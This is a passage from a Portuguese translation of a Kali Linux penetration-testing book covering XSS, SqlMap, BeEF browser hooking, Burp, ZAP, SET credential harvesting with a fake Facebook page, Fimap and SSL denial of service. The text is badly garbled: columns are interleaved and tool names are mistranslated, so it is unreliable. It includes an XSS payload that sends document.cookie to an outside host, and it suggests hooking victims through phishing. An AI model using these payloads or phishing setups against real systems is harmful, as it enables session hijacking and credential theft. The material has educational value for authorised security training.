banco de dados em nosso web Cross-site scripting (XSS) uma CHAOS <script> alert [205]
servidor. Vemos que temos vulnerabilidade encontrada em ('www.DrChaos.com') </ script>
recuperado com xito duas tabelas, aplicaes web. XSS permite Voc pode usar o script anterior para Atacando Autenticao
administrador e contedo. atacantes para injetar os scripts no testar qualquer site no entanto, no Uma vez que executou o script de
Uma vez que voc execute o seguinte site. Esses scripts podem ser usados recomendamos XSS no campo de entrada nome de
comando, SqlMap ir exibir todas as para manipular introduzir a corda em cada site que usurio, notamos algum cdigo foi
tabelas: o servidor web, ou os clientes que se voc se deparar, como poderia alertar exibido no site. Neste ponto, ns
SqlMap-u conectam ao servidor web. as metas de seu fomos capazes de gerar um alerta
http://www.drchaous.com/article.php?i Cross-site scripting foi responsvel por intenes maliciosas. Se voc optar pop-up
d=5 uma grande maioria de ataques por usar um script semelhante para sempre que o nome de usurio era
Teste D-- tabelas baseados na web populares. testar cross-site scripting, visto no site.
Colunas especficas podem ser Muitas vezes, quando minha equipe certifique-se de usar um outro site que Alm disso, http://xss.progphp.com/
selecionados usando o seguinte solicitada pelos clientes para examinar no seja www.DrChaos.com no script. um outro site popular para testar
comando: comprometida Testando cross-site scripting ataques XSS
e scripts. Voc pode ter vrios scripts
e introduzi-lo no site para ver como
XSS interage com sites e seu prprio sucedido), basta compartilhar a URL Para o nosso exemplo, a nossa O foco deste livro est alavancando
navegador web de forma segura. completa com primeira conta intitulado TheDude. ferramentas disponveis no Kali Linux,
Cookie de XSS roubo / Autenticao seu amigo, incluindo a sua Em seguida, vamos para o trecho no entanto, o melhor
seqestro identificao nica. seo e criar um novo trecho. Iremos Testadores de penetrao usam uma
Script kiddies pode usar XSS para a No use a mesma senha para sua introduzir um script de XSS aqui como variao de ferramentas disponveis
gerao de alertas pop-up no entanto, conta Gruyere como voc usa para mostrado na do setor, como Kali Linux, e
como um profissional qualquer servio real. tela a seguir: ferramentas personalizadas, como
Verificador da penetrao, o valor real Vamos examinar um exemplo do uso Sabemos Gruyere tem scripts XSS de violao alvos.
de XSS para obter acesso de uma vulnerabilidade XSS para vulnerabilidades XSS embutido, e, Sugerimos a investigar este tema
privilegiado a um sistema. roubar um cookie de sesso. portanto, estamos usando e testar novos scripts contra o seu
A prxima seo ir examinar como Se voc tentar esta tcnica em uma um script. No mundo real, podemos alvo exemplo Gruyere para dominar a
fazer isso. Se voc no tiver feito isso, rede local, o Kali caixa e servidor web usar o mesmo script em qualquer habilidade de
criar vulnervel campo em um alvo construir e executar ataques de script
seu prprio exemplo Gruyere online deve ser capaz de comunicar. Como site para testar se vulnervel a XSS. personalizado.
para testar conceitos a prxima seo. estamos usando projeto Gruyere, Por exemplo, se soubssemos Outras ferramentas
Navegue at http://google- precisvamos Facebook foi urlsnarf
gruyere.appspot.com/start. App colocar nossa caixa de Kali Linux na vulnervel a um ataque XSS explorar Aqui esto algumas outras
Engine ser iniciado Internet com um endereo IP voltados o campo nome do meio, um invasor ferramentas que seguem o tema deste
uma nova instncia de Gruyere para ao pblico, de modo Kali Linux precisa criar um perfil e usar este Chatper e disponvel em Kali
voc, atribuir-lhe uma identificao pode se comunicar corretamente com script como o seu nome do meio. Linux:
nica e redirecion-lo para o servidor Gruyere alvo. [207] urlsnarf uma ferramenta que gera
http://google- [206] todas as URLs solicitadas cheirou de
gruyere.appspot.com/123456/ (Onde Atacando Autenticao trfego HTTP em
123456 o nico Captulo 5 Facebook no explorvel usar este Formato de log comum (CLF, usado
ID para este exemplo). Normalmente, dando Kali Linux um ataque. apenas um exemplo por quase todos os servidores web),
Cada instncia de Gruyere est endereo IP pblico realmente uma hipottico. adequado para off-line
completamente isolado de todos os m Entramos no seguinte cdigo: ps-processamento com o seu web
outros casos, para que o seu prtica. Executar este passo pode <script> document.write ("<img src = log anlise ferramenta favorita
instncia no ser afetado por significar a abertura de firewalls e 'http://kali.drchaos.com/var/www/xss_ (analgico, wwwstat e
qualquer outra pessoa usando tendo Kali Linux exposta a ataques laboratrio / lab_script.php? "+ assim por diante).
Gruyere. Voc precisa usar o seu remotos. document.cookie +"> ") </ script> Para acessar urlsnarf, navegue at
identificao nica, em vez de 123456 Quando voc entrar em Gruyere, crie Embora as palavras pode envolver em Sniffing / Spoofing |Sniffers de rede e
em todos os exemplos. um nome de usurio, clicando no torno de como voc digitar o selecionar urlsnarf. A Terminal ir
Se voc quiser compartilhar o seu Inscrever-se boto comando, ele precisa aparecer apresentando opes de
trabalho e projeto de concluir em na tela lado superior direito, como ser um nico comando de linha. uso, como mostrado na
Gruyere com algum mostrado na imagem seguinte: Este apenas um dos muitos scripts a tela a seguir:
outra coisa (por exemplo, para Para este exerccio, criamos duas que podem ser usados para explorar Para usar urlsnarf, tipo urlsnarf-i ea
mostrar-lhes um ataque bem- contas separadas. Vamos entrar com um sistema vulnervel. interface que voc deseja monitorar.
a primeira conta. urlsnarf
ir mostrar que est ouvindo. Esta calcular os campos de checksum e autenticar. Comeamos, fornecendo Firewalls, IPS / IDS, produtos de
captura de tela a seguir mostra tamanho do pacote de protocolos TCP uma viso geral dos diferentes segurana baseados em host, como
urlsnarf lista para eth0: / IP. mtodos utilizados anti-vrus, filtros de contedo,
[208] [209] para confirmar a identidade. A prxima etc No passado, essas defesas foram
seo coberto atacar o processo de suficientes, no entanto, as ameaas
Captulo 5 Atacando Autenticao gesto esto se tornando mais
urlsnarf ir exibir um dump de Patator sesses de autenticao. Em seguida, sofisticado hoje em dia, com a
qualquer pedido de URL visto no fio. Patator um multi-purpose utilitrio de avaliou-se como os dados de sesso capacidade de contornar comercial da
Por exemplo, fora bruta, com um design modular e armazenado em um usurio de prateleira ou
um usurio de Windows acessos flexvel navegador por comprometer a gesto solues de segurana "COTS". As
www.thesecurityblogger.com. As uso. Capacidades do patator incluem cookie. Ns, ento, coberto como ferramentas abordadas neste captulo
solicitaes de URL so FTP, SSH-forando bruta, Telnet, capturar incluem mtodos
apresentado em urlsnarf para uso SMTP, HTTP / as sesses de autenticao por Kali Linux, utilizado para contornar as
futuro. HTTPS, POP, IMAP, LDAP, SMB, escondendo entre os alvos utilizando defesas de segurana padro a partir
acccheck MSSQL, Oracle, MySQL, DNS, SNMP, vrias formas de man-in-the- de uma localizao remota.
acccheck uma ferramenta de ataque e um ataque pelo meio. Este captulo termina arsenal de
de dicionrio senha que tem como arquivos de senha. Vulnerabilidades de autenticao As ataque do verificador da penetrao.
alvo a autenticao do Windows DBPwAudit duas sees finais avaliadas web Aps analisar o material
utilizando o protocolo SMB. acccheck DBPwAudit realiza auditorias on-line servidores de aplicaes, tais como coberto nos captulos anteriores, voc
um script invlucro em torno do de qualidade de senha para vrios injeo de SQL e cross-site scripting. deve entender como conduzir
binrio smbclient, banco de dados O prximo captulo ir cobrir ataques reconhecimento
e, como resultado, dependente dele motores. O aplicativo projetado para remotos ou da Internet para servidores em um alvo, identificar
para a sua execuo. permitir a adio de drivers de banco e clientes. vulnerabilidades do servidor e do lado
hexinject de dados adicionais [210] do cliente, e as tcnicas utilizadas
hexinject um injetor pacote verstil e copiando novos drivers JDBC para o para
sniffer que fornece uma linha de JDBC diretrio. Ataques na Web explor-los. Este captulo ir cobrir o
comando Resumo O foco deste captulo ser sobre elemento final de ataque relacionado
estrutura para o acesso rede cru. Comprometer autenticao permite ataques baseados na Internet. Os ao uso de web
hexinject projetado para trabalhar que um atacante passar por uma administradores de segurana aplicaes como um front-end. Alm
em conjunto com outros pessoa autorizada. para as organizaes esto disso, vamos explorar como tirar
utilitrios de linha de comando, e por Isto pode ser til quando as conscientes de que h partidos proveito do
esta razo que facilita a criao de aplicaes web de teste de maliciosos na Internet, prprio servidor web e de
poderosos penetrao, porque ter continuamente procura de maneiras compromisso aplicaes web usando
shell scripts capazes de leitura, acesso autorizado significa ignorar a de penetrar qualquer rede que se exploits, como navegador
interceptar e modificar o trfego da maioria das defesas de segurana deparar e em ataques de explorao, ataques de
rede em tradicionais. defesa, os administradores tm proxy e colheita senha. Ns tambm
de forma transparente. hexinject pode Captulo 5, Atacar de autenticao, medidas de segurana no local. ir abranger
injetar qualquer coisa na rede, bem focado em atacar como os usurios e Defesas comuns incluem
como sistemas
mtodos para interromper servios aplicaes de vrus visando os o servidor de carne bovina. Uma vez vulnervel a ataques, uma vez que se
utilizando tcnicas de negao de vulnerabilidades encontradas em que comea a carne bovina, as URLs reconectar Internet,
servio. navegadores comuns, tais como para gerenciar Carne de gancho independentemente se eles acessam
Explorao Navegador Quadro - Internet Explorer e Firefox. vtimas vontade o link gancho antes de voltar a usar a
Carne Carne bovina no est includo com a ser exibido na janela de terminal: internet. A prxima imagem mostra
verso 1.0 do Kali Linux, mas pode Para acessar o servidor de principal de carne bovina
Ataques na Web ser encontrada em administrao, abra um navegador e painel de instrumentos e opes
Vulnerabilidades do browser pode ser beefproject.com. Esperamos carne v para a / Ui / painel disponveis para lanar contra um
explorada por um software malicioso bovina para ser adicionado em uma URL. Quando enganando a vtima sistema viciado:
para manipular o verso futura do Kali para ser fisgado por carne bovina, [214]
o comportamento esperado de um Linux com base em sua popularidade redirecionar as vtimas para o
navegador. Essas vulnerabilidades na comunidade de testes de URL do servidor gancho de carne Captulo 6
so um vetor de ataque popular, penetrao. bovina listados como hook.js. Voc vai O exemplo anterior mostra um laptop
porque a maioria dos sistemas de Para instalar a carne, abra um precisar para desenvolver uma ligado do Windows. Carne bovina
acolhimento alavancar algum tipo de terminal de comando em Kali Linux estratgia para obter pode revelar os detalhes,
software navegador de Internet. como usurio root e emisso as vtimas para acessar sua URL por exemplo, se a vtima est usando
Vamos os seguintes comandos: gancho, como um phishing ou ataque o Firefox, o Windows 32, plugins de
dar uma olhada em uma ferramenta de engenharia social, navegadores especficos,
popular desenvolvido para explorar que redireciona os usurios para scripts, se o Java est ativado e
vulnerabilidades do navegador. apt-get update carne bovina. outras informaes teis. O atacante
H muitas aplicaes de teste de apt-get install carne-XSS [213] pode
penetrao legais que devem ser Voc pode ser solicitado a instalar, executar comandos em mquinas em
includos em atualizar ou substituir alguns arquivos Ataques na Web forma de gancho, como fazer um som
seu arsenal de hackers, como um dos mais antigos quando voc executar o Neste exemplo, iremos para: carrilho, sesso grab
nossos favoritos conhecido como apt-get update comando. Na maioria http://172.16.86.144:3000/ui/panel. cookies, capturas de tela captura,
Explorao Navegador dos casos, voc pode simplesmente Padro registrar as teclas digitadas, e at
Quadro (Carne). A carne bovina um aceitar as instrues padro. nome de usurio e senha so carne mesmo usar o navegador viciado
pacote baseado em navegador Quando o processo de atualizao for bovina. como
explorar esse "ganchos" um ou mais concludo, voc pode usar apt-get Quando a vtima clica ou um proxy para atacar outros sistemas.
navegadores como cabeas de ponte instalar Beef: redirecionado para o site "hook.js", o Outro exemplo ter o registro do
para o lanamento de ataques. Um Uma vez que o processo for atacante do sistema viciado
usurio pode ser ligado atravs do concludo, voc ter de carne bovina Servidor Beef ver o navegador no Facebook e usando carne bovina
acesso a instalado no Kali Linux. viciado. Beef ir adicionar o novo para capturar o cookie de sesso. Um
URL personalizado e continuar a ver o [212] sistema para uma lista de atacante pode responder
trfego da web tpico, enquanto que metas e exibi-las se a vtima viciado para a sesso autenticada e ter
um atacante tem acesso Captulo 6 online. Desconectado vtimas se acesso total a conta do Facebook da
para a sesso do usurio. Beef ignora Para iniciar a carne, navegue at / Usr tornaro vtima.
appliances de segurana de rede e / share / carne-XSS diretrio e tipo . /
host-based, anti- Carne para iniciar
As possibilidades para o mal ea que se apresentam como uma parte 4. Clique em Ok para salvar o novo www.DrChaos.com, Eles esperam
destruio so infinitas. Esta cabea confivel proxy. para ser direcionado para o site. Um
de ponte poderia permitir que um compartilhando coisas envolvidas com Neste ponto, FoxyProxy est servidor proxy
atacante acesso irrestrito para o links maliciosos / software / cdigo e desativado permitir todo o trfego sem interceptar esse pedido e envi-lo em
navegador do usurio e todas as assim por diante. um proxy no lugar, como nome de um cliente. Os servidores
informaes que necessrio para FoxyProxy - Plugin do Firefox estabelecido Desabilitar proxy so normalmente
acess-lo. Se voc planeja usar proxies para completamente o FoxyProxy no postas em prtica para inspecionar o
Carne bovina fornece os detalhes dos testar aplicaes web, como Zed separador superior. Para usar um trfego e proteger os clientes a partir
sistemas de gancho e registra os Proxy Ataque proxy, clique na guia de dados nocivos. Como
comandos que so (ZAP) ou BURP, voc pode querer e alter-lo para o seu proxy desejado. Verificador da penetrao, voc pode
executado. Ambos os detalhes dos usar o plugin do Firefox FoxyProxy Esta caracterstica faz com que seja usar um servidor proxy para
hosts individuais e log de comando para simplificar fcil para alternar entre ou interceptar o trfego de um cliente,
executado com sucesso alternando entre, bem como permitir o desativar proxies no Firefox copie
informao pode ser copiado para um uso de Proxy. FoxyProxy uma rapidamente: o pedido, ou manipul-lo:
relatrio final final: extenso do Firefox [217] Pergunte o que Bob
[215] que permite que voc gerencie o tempo atual
facilmente, mudana, habilitar ou Ataques na Web O que
Ataques na Web desabilitar as configuraes de proxy BURP Proxy o tempo atual
Defendendo contra ferramentas de no Firefox. Arroto Procurao uma ferramenta Alice
penetrao baseados em navegador Voc pode baixar FoxyProxy do que intercepta trfego HTTP e Procurao
difcil. A melhor defesa Firefox add-on biblioteca. HTTPS. Ela permite uma penetrao Prumo
garantir que todos os softwares Uma vez FoxyProxy est instalado, Testador ao analisar um pedido, suas Bob diz que a
baseados em navegador atualizado haver um cone adicionada no topo vulnerabilidades, eo de duas vias de o tempo 07:00
com as ltimas verses e do Firefox trfego entre O tempo
patches de segurana, juntamente janela do navegador. Clique sobre um cliente e um servidor web. Arroto 7:00
com a desativao do navegador de isso para abrir a caixa de dilogo Procurao muito popular por causa Para iniciar Burp Suite, basta navegar
executar Flash e Java. Em Opes FoxyProxy: de sua capacidade de no at: Barrilha |Sniffing / Spoofing
solues disso, de segurana que [216] s examinar o trfego, mas tambm, |Sniffers Web
podem detectar ameaas baseadas ele manipula solicitaes. Vamos e selecione Burp Suite.
em aplicaes comuns, tais Captulo 6 examinar como [218]
como Prxima Gerao de Intruso Para adicionar um proxy para Arroto Procurao usado para
Sistemas de Preveno (NGIPS) pode FoxyProxy, faa o seguinte: manipular, responder e roubar Captulo 6
fornecer um extra 1. Clique no Adicionar Novo Proxy autenticao. Uma vez Arroto Suite lanado, voc
camada de segurana. A maioria das boto, e uma nova janela ser aberta. importante lembrar que o arroto ser presenteado com o painel de
vtimas de ferramentas de penetrao, 2. Selecionar Configurao manual do Procurao realmente uma parte de instrumentos lanamento Burp:
como carne bovina so usurios proxy. Burp Suite, que Para configurar Burp, clique no
que clicar em links includos em e- 3. Digite o endereo IP ou host eo uma coleo de ferramentas. Quando Procurao guia. Por padro, o
mails ou convidados de mdia social nmero da porta do servidor proxy. um usurio digita uma URL no seu Interceptar boto selecionado
navegador da Web, como http://
neste guia. Quando o Interceptar [219] webpage carregado com xito no no proxy. URLs que esto em cinza
opo ativada, Burp pra todos os navegador da web. Algumas pginas significa que voc no tenha
pedidos a partir de um Ataques na Web web tm mltiplas pesquisado diretamente os
navegador para o servidor web. O Vamos usar a interface de loopback componentes, de modo que voc alvos, enquanto URLs em preto so
recurso permite que um verificador da para o nosso exemplo: pode precisar para selecionar o Para a os locais em que foram explicitamente
penetrao a capacidade de O prximo passo configurar o frente boto vrias vezes antes navegou:
examinar uma ligao. O verificador navegador para usar Burp Suite. as cargas de pgina web. Para usar o Aranha funo, clique
da penetrao pode permitir Todos os navegadores tm uma Outro recurso interessante Burp com o boto direito em um alvo e
manualmente a conexo com de forma semelhante usando um Spider. Arroto Aranha oferece uma selecione Aranha este host:
continuar uma vez que visto. servidor proxy. No prximo exemplo, forma de mapeamento web [222]
O Interceptar boto exige a temos representado o aplicaes em uma forma
interveno manual, ou o pedido ser definies para configurar um servidor automatizada. Como Burp Aranha Captulo 6
nunca faz-lo para o servidor web. proxy no Firefox: obras que primeiro Quando voc vai para o Aranha guia
A prxima configurao encontrado Por exemplo a seguir, iremos para um configurao Burp a procurao seu no arroto, voc vai notar a Aranha
na Opes submenu. Esta seo URL, como www.DrChaos.com em uso da Internet, como tnhamos Estado contagem
permitem aos usurios verificar ou Firefox. Voc vai notar que nada explicado anteriormente. Em seguida, mudaram desde 0para um nmero de
alterar a porta padro em que Burp acontece. Isto porque o Interceptar voc acumular:
est em execuo, bem como caracterstica permitir Burp Aranha, e enquanto ele Se Burp encontra qualquer forma, ele
configurar a interface de rede ou visto ativado por padro, como discutimos estiver sendo executado, Burp ir ir pedir-lhe para preencher os
pelo arroto. Por padro, o arroto anteriormente. Agora voc pode ver a mapear todas as solicitaes e formulrios ou ignor-los.
definido para ser executado no Interceptar guia em oferecem a possibilidade de aranha Se voc preencher os formulrios,
interface de auto-retorno, como Burp mudou as cores para indicar um qualquer pedido capturado para Burp continuar a ver o que mais ele
mostra a imagem a seguir. A interface novo pedido foi interceptada. encontrar novos alvos. pode aranha em pginas
loopback um [220] Para usar o Aranha, clique no Aranha alm das formas:
interface especial que geralmente tem aba para abrir a pgina de [223]
o endereo IP do 127.0.0.1 associada Captulo 6 configurao padro.
com ele. Faz Quando voc clica no Interceptar guia, Clique no Aranha est em pausa Ataques na Web
no tem uma conexo de hardware voc vai ver a natureza exata do boto para alterar o status para Quando o Aranha processo estiver
fsico vinculados a ela, mas um pedido. Aranha est em execuo: concludo, volte para Alvos guia e
caminho para a operao Agora voc pode clicar em Para a [221] encontrar o host que voc
sistema de referncia prprio. Em frente ou Cair para permitir ou negar o originalmente selecionado para
outras palavras, quando voc quer se pedido especificamente Ataques na Web aranha. Clique no tringulo ao lado do
comunicar com de continuar: Burp mapeia todas as solicitaes de anfitrio para expandi-lo. Voc
-se em rede, voc pode usar um auto- Quando voc clica no Para a frente visto pelo proxy sob a Alvo guia. vai ver todos os resultados de aranha
retorno. Se voc est pensando em boto, voc ver o pedido de Clique no Alvo sob o seu alvo original:
testes Arroto Suite continuar guia para ver o que foi capturado. Burp mostra todas as pginas e links
alm da mquina local, voc deve para o servidor, assim como a Haver uma lista de alvos que esto que o Aranha processo foi capturado.
adicionar a sua interface Ethernet e resposta a partir do servidor. Alm sendo usados Alm disso, ele
endereo IP. disso, voc deve ver o
ir capturar o diretrio raiz, estilos de como XSS) vulnerabilidades. Voc vai precisar para gerar um Google criou o projeto Gruyere como
pgina web, sub-pastas e scripts Java. ZAP vem embutido no Kali Linux 1.0, certificado antes de poder usar ZAP. um meio para testar exploits aplicao
O e pode ser encontrado em Sniffing / Uma vez ZAP e Firefox so web
prximo exemplo mostra vrias, sub- Spoofing | configurados, carregar qualquer URL e defesas. site O projeto Gyuyere tem
pastas capturados no site Sniffers Web e selecionando OWASP no Firefox. Voc vai ver o vrias vulnerabilidades embutidos
www.Drchaos.com. - ZAP, ou simplesmente abrir uma sites agora esto aparecendo na ZAP para ele, incluindo XSS. Voc pode
[224] janela de terminal sob o Sites guia. Neste exemplo, ns executar o seu prprio projeto de
e digitar zap, como mostrado no fomos Gruyere on-line, ou voc pode
Captulo 6 exemplo a seguir: para www.DrChaos.com e percebi que transferi-lo para uma mquina local
Burp tem a capacidade de filtrar os [225] temos muito poucos sites que foram para o seu teste:
itens usando o cinza Filtro bar no topo carregados porque Crie a sua prpria instncia de
da pgina. Ataques na Web de todos os links na Gruyere para testar ZAP. Quando
Quando voc clica no Filtro boto, ele Aqui est um resumo da criao de www.DrChaos.com pgina: voc fizer isso voc vai ser dada
vai expandir as opes disponveis ZAP com o Firefox, como explicado no ZAP tem a opo de executar seu prprio URL nico. Foi-nos dada
para Captulo 3: scanners ativos ou passivos. Scans http://google-gruyere.appspot.
filtrar os resultados: 1. Aceite o acordo de usurio. passivos no executar com/326352883334 / para o nosso
O Aranha opo em Burp permite um 2. Gerar um certificado SSL ou ataques e deve ser seguro para ser URL.
verificador da penetrao da web para importar um j existente. executado em qualquer aplicao Ns vamos voltar a ZAP e fazer uma
ver como a web 3. Importe o certificado em um web. Varreduras ativas executado um varredura rpida deste URL:
aplicao ou um site configurado, o navegador web como o Firefox, v em nmero [227]
que os links so contidos, e para onde Preferncias |Avanado e de ataques e esto funcionando
esses links levam. Uma analogia selecionando a Criptografia sub- ativamente cdigos contra aplicaes Ataques na Web
deste conceito estar em uma sala seo. web, o que pode O exemplo a imagem mostra um
com muitas portas 4. Clique em Exibir Certificados e disparar alarmes para determinados grupo de SEED arquivos, incluindo um
e tendo a capacidade de explorar importar o certificado. produtos de defesa de segurana. que
cada porta simultaneamente. 5. Confira todas as opes de [226] curiosamente rotulada: http://google-
OWASP - ZAP confiana para o uso do novo gruyere.appspot.com/326352883334/
ZAP um fcil de usar, integrado certificado. Captulo 6 invlido.
ferramenta teste de penetrao para 6. Configure seu navegador de O exemplo a seguir estar usando Quando colocamos isso em um
encontrar o Internet para usar ZAP como o proxy ambos os scans ativa e passiva. navegador, obtemos a seguinte
vulnerabilidades em aplicaes web. padro. No Firefox, uma boa idia mensagem de erro:
Ns fornecemos uma breve viso isso encontrado em Preferncias ter um servidor web que voc pode Quando se trata de XSS, os
geral de como usar |Avanado |Rede. testar em vez de tentar ZAP em um personagens mais perigosos so uma
ZAP em Captulo 3 sobre a 7. Digite o servidor proxy localhost eo no autorizado URL <e >. Se um
digitalizao de um alvo para nmero da porta 8080, Que o servidor. Porque queremos praticar hacker pode obter um aplicativo para
possveis vulnerabilidades. Vamos padro para o proxy ZAP. em um servidor web vulnervel inserir o que eles querem em uma
revisitar ZAP para identificao e 8. Marque a caixa para usar o servidor estamos autorizados pgina usando <e >
explorao de cross-site scripting proxy para todos os protocolos. para o teste, vamos voltar a usar o
(vulgarmente designado Google Gyuyere projeto.
diretamente, que abre uma porta para como ataques XSS. Algumas pessoas Ferramentas de engenharia |se-toolkit. para garantir que voc tenha as
injetar scripts maliciosos. Aqui esto acreditam que os usurios no Certifique-se SET atualizado se isso ltimas atualizaes. Se voc receber
alguns outros precisam se preocupar com XSS se a primeira vez de us-lo. Passos um erro informando no
interessante SEED arquivos: quando navegar em sites se o para atualizar SET Existem repositrios Git, voc pode ter
[228] navegador anuncia que tem e verificar se GIT est instalado pode instalado GIT incorretamente ou o
capacidades de defesa XSS. ser encontrada em Captulo 4. passos mudaram desde a escrita
Captulo 6 A verdade por trs desse conceito Quando SET clones de um site, ele ir deste texto. Consulte a editora de
Aqui est um exemplo de tirar proveito que a confiana na proteo do executar um servidor web. site, blog do Aamir Lakhani em
de um desses SEED links por injeo navegador no pode ser perfeito, com importante www.DrChaos.com ou Jos Muniz de
de um base que quem est sendo alvo capaz de blog em www.thesecurityblogger.com
script. Vamos criar um URL e adicione no princpio de que os navegadores conectar ao seu servidor web. para mais truques sobre como usar
o alert (1) script para ver se o site vai no esto cientes de quo seguro o Isto significa que qualquer ataque SET
criar um erro de pop-up: cdigo est por trs da baseado na Internet ter de alavancar Kali com Linux.
http://google- aplicao web. Hackers inteligentes um pblico 1. Uma vez que SET atualizado,
gruyere.appspot.com/326352883334/ pode ser capaz de contornar essa Endereo IP (ou atravs de NAT ou selecione a opo 1 para ataques de
alerta <script> (1); proteo, tais como directamente sobre Kali Linux), bem engenharia social-.
</ Script> explorando uma vulnerabilidade de como 2. Selecione a opo 2 para Vetores
O exemplo mostra o nosso problema XSS e emitir os scripts contra as abertura de regras de firewall para de Ataque Site
de servidor de aplicao web alvo foras que visitam o site. permitir o acesso a Kali de um local 3. Selecione a opo 3 para
uma prova de contexto que Melhores prticas para proteger seu remoto. Credencial Harvester Ataque
este site vulnervel a um ataque. servidor e os clientes acessar seus Depois de ter tomado o cuidado de Voc tem algumas opes de como
Podemos usar ZAP para repetir o aplicativos todas as configuraes de IP, hora voc deseja clonar um site. SET tem
ataque, tente outro identificando e corrigindo de lanar SET: modelos para
ataques ou mtodos de ensaio XSS vulnerabilidades usando uma Vamos agora usar SET para colher sites populares, como Facebook e
similares. ferramenta como o ZAP. senhas. SET tem a capacidade de Gmail. s vezes, esses modelos no
Recomendamos a brincar com os [229] clonar qualquer site funcionam;
erros que voc encontrar e ver se voc quer. Estamos realmente indo no entanto, recomendvel comear
voc pode manipular Ataques na Web para escolher um dos engenharia com estes ou clonagem de outro site.
-los para gerar uma sada sensvel Colheita senha SET social mais popular Para clone
para seus exerccios de testes de Foram examinados os fundamentos sites neste exemplo clonar. Concordar um site, voc precisa de um URL, e
penetrao. O Gruyere da Engenharia Social Toolkit (SET) em qualquer contrato de licena que SET ir automaticamente tentar clon-
projeto uma tima maneira de testar em Captulo 4. Estamos voc pode se deparar lo.
suas habilidades de encontrar outras vai revisitar SET e olhar para alguns com SET: Se voc j tiver um site clonado ou se
vulnerabilidades usando ZAP. conceitos avanados de colheita e [230] os arquivos HTML carregado no Kali,
Para se defender contra ataques senha voc pode
remotos, ZAP pode ser timo para captura de informaes privilegiadas. Captulo 6 selecionar importao personalizada.
testes de vulnerabilidades web, tais Como um lembrete, vamos lanar Selecionando a opo 5 Ao selecionar esta opo, voc
SET, indo para Ferramentas de recomendado para atualizar SET precisa dizer onde Kali
Explorao |Social antes de usar a ferramenta
os arquivos HTML esto localizados Fimap. Quando voc abre Fimap, uma exemplo mostra que o nosso objectivo
no sistema de arquivos local. Captulo 6 janela de terminal abre exibindo a no vulnervel a um ataque de
[231] Quando entramos em nosso nome de casa incluso de arquivos:
usurio no site falso Facebook, SET tela. Fimap tem algumas opes do Negao de Servios (DoS)
Ataques na Web captura o trfego. plugin, que voc pode baixar usando a Normalmente, um exerccio de teste
Para o nosso exemplo, vamos SET tambm ir redirecionar os seguinte comando: de penetrao focada em identificar
escolher modelos de web. SET vai usurios para o site real. A esperana Fimap - install-plugins as lacunas na
perguntar sobre o endereo IP que as vtimas sero Todos os plugins disponveis sero segurana, em vez de prejudicar o
deve escutar. Este ser o endereo IP acredito que eles entraram na sua exibidos como uma lista, com a opo sistema. Esta uma caracterstica
para a interface em Kali Linux. O senha incorreta quando redirecionado de escolher um para instalar chave que separa uma verdadeira
exceo a isso quando se usa NAT para o real e Facebook ou ento sair. No exemplo a seguir, h atacante de um verificador da
em um firewall. Nesse caso, voc vai continuar usando Facebook sem dois plugins disponveis para instalar. penetrao autorizado. Hackers de
precisar usar saber que SET capturado suas Voc verdade no seguem as regras
o NAT ou o endereo pblico, em vez credenciais de login: ter que executar o comando instalar e no esto preocupados com a
de endereo IP na Kali Linux para que O exemplo anterior mostra SET havia duas vezes para instalar cada plugin interrupo de negcios, se ele pode
as metas podem capturado o nosso nome de usurio: individualmente: melhorar a sua situao.
acessar o sistema. O prximo DrChaos, e nossa Para usar Fimap, primeiro voc Em alguns casos, um hacker est
exemplo usar o endereo de Senha como ILoveKali. precisa determinar o seu alvo, olhando para criar qualquer tipo de
loopback local 127.0.0.1. Quando tiver concludo este exerccio, especificando a URL. L impacto negativo sobre um alvo,
Em seguida, SET vai pedir para pressione Ctrl + C para sair da so opes para especificar uma URL, incluindo derrubar sistemas crticos.
selecionar um modelo. Para este ferramenta SET e uma lista de URLs usando o Google Por esta razo, faz todo o sentido, em
exemplo, vamos selecionar Facebook. gerar um relatrio HTML. SET cria um para adquirir URLs, ou outro alguns casos
O prximo exemplo mostra um relatrio profissional que pode ser mtodos, como URLs de colheita de para testar sistemas para o risco de
navegador indo para 127.0.0.1 e utilizado em outras URLs, bem como olhar para as Denial of Service (DoS) tipo ataques.
exibindo o nosso falso seu teste de penetrao relata: formas e Isto vulgarmente
Facebook page. Se uma pgina [233] cabealhos. Por exemplo, o seguinte, denominado como testes de estresse
modelo no parece muito bem, voc vamos direcionar de seus servios voltado para a
pode querer usar um Ataques na Web www.thesecurityblogger.com. Internet.
diferente modelo ou clonar a pgina Fimap [234] absolutamente fundamental ter uma
desejada: Fimap uma ferramenta Python que aprovao para testar um trunfo para
Observe nossa estados barra de pode encontrar, preparar, auditoria, Captulo 6 DoS
endereo 127.0.0.1. Normalmente, explorar e Google automaticamente Para digitalizar thesecurityblogger.com vulnerabilidades. Alguns mtodos de
voc precisar usar algum outro para o arquivo local e remoto Incluso site, digite o seguinte comando: ataque pode ter um impacto negativo
vetor de ataque para enganar os (LFI e RFI) bugs em aplicaes web. Fimap-u 'http://wwwthesecuri- para
usurios para ir para o seu site. H Fimap pode ser encontrado em tyblogger.com' um sistema de teste ps-penetrao.
inmeras maneiras de fazer isso, Aplicaes Web |Scanners de Fimap tentar identificar as Aconselha-se a testar contra
como enviar-lhes um link ou um e-mail Vulnerabilidade Web | vulnerabilidades de incluso de redundante
falso: arquivos. A sequncia
[232]
sistemas, equipamentos de inundaes baseadas em pacotes DoS. Aqui esto mais algumas
laboratrio, ou sistemas de no- falsificados. O propsito o de saturar ferramentas Captulo 6
produo, se possvel. a largura de banda de disponvel em Kali Linux para realizar Para acessar THC-SSL-DOS,
O ataque mais comum envolve DoS website da vtima. ataques DoS: navegue at Teste de Estresse |Teste
inundando um alvo com a Os ataques de protocolo: Ele consome Para testar DoS, voc pode usar Web Stress |THC-SSL-
comunicao externa recursos de servidores ou www.upordown.org para ver se dos. Isso far com que uma janela do
pedidos. Essa sobrecarga impede o intermedirio um site est disponvel. terminal com a pgina inicial para
recurso de responder ao trfego equipamentos de comunicao, tais THC-SSL-DOS THC-SSL-DOS. Para
legtimo, como roteadores, firewalls, O Secure Socket Layer (SSL) usado executar THC-SSL-DOS contra um
ou retarda a sua resposta de forma balanceadores de carga, para proteger as conexes e alvo, o tipo t:
to significativa que ele processado e assim por diante. Exemplos disso transaes atravs da Internet. THC-SSL-dos [opes] <ip do <port>
indisponveis. Ataques DoS so as inundaes SYN, Ping da Estabelecendo uma conexo segura victim> e - aceitar
pode direcionar os recursos do morte, Smurf, Teardrop, SSL requer de 15x Voc deve incluir - Aceitar ou voc
sistema (IE espao em disco, largura pacotes fragmentados, e assim por mais poder de processamento no receber a seguinte mensagem de
